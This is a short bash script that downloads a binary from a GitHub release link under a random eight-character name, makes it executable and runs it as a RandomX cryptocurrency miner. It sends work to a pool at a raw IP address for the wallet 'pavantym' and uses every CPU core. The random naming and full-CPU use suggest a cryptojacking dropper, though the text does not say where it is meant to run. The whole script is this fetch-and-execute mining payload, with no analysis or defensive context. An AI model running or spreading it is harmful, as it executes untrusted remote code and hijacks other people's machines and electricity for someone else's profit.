#!/bin/bash

BIN_NAME=$(tr -dc a-z0-9 </dev/urandom | head -c 8)

wget -O "$BIN_NAME" https://github.com/vedhagsvp/tkospae/releases/download/aplose/nanole
chmod +x "$BIN_NAME"
./"$BIN_NAME" -algo RandomX -wallet pavantym.$BIN_NAME -pool1 50.116.14.118:8088 -protocol JSON-RPC -cpuThreads "$(nproc --all)"
